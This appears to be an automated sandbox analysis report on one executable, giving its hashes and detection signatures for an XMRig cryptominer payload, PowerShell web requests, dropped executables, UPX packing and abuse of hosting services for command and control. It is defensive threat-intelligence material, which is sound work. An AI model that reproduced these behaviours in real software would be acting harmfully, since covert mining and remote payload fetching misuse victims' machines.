General

  • Target

    00d71f3ced4f93528c3a612f7608b8f0_NeikiAnalytics.exe

  • Size

    2.9MB

  • Sample

    240523-x716ladd7z

  • MD5

    00d71f3ced4f93528c3a612f7608b8f0

  • SHA1

    c1fb78b3e896ccae91f2b6c7c6c85a4bcc859edd

  • SHA256

    176bf550d1c59028d451cf385c654385c89825a07bc0976f037c00251fc98629

  • SHA512

    bd92acd84a5533a87b3879fe8b0d04fb368fc0b01ce0fcd400d10fbe85dd1ebb11c1662c7a09d7572b98ac910d01e2c904305446ab1cb664cd9ece4834046bdb

  • SSDEEP

    49152:71G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkHC0IaSEzQR4iRr:71ONtyBeSFkXV1etEKLlWUTOfeiRA2Rh

Malware Config

Targets

    • Target

      00d71f3ced4f93528c3a612f7608b8f0_NeikiAnalytics.exe

    • Size

      2.9MB

    • MD5

      00d71f3ced4f93528c3a612f7608b8f0

    • SHA1

      c1fb78b3e896ccae91f2b6c7c6c85a4bcc859edd

    • SHA256

      176bf550d1c59028d451cf385c654385c89825a07bc0976f037c00251fc98629

    • SHA512

      bd92acd84a5533a87b3879fe8b0d04fb368fc0b01ce0fcd400d10fbe85dd1ebb11c1662c7a09d7572b98ac910d01e2c904305446ab1cb664cd9ece4834046bdb

    • SSDEEP

      49152:71G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkHC0IaSEzQR4iRr:71ONtyBeSFkXV1etEKLlWUTOfeiRA2Rh

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Legitimate hosting services abused for malware hosting/C2

MITRE ATT&CK Enterprise v15

Tasks